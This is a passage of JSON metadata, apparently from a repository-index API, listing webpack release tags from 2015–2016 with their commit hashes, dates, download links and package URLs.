1fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"h